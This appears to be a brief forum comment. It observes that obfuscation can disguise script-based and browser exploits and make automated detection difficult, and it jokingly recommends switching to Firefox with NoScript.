It's important to be aware that it is always possible to use obfuscation in script based exploits (including browser exploits) to disguise pretty much any code you wish, including the HTML components. This particular characteristic of script based exploits definitely can make automated detection very challenging. Time to switch to using Firefox and NoScript ;)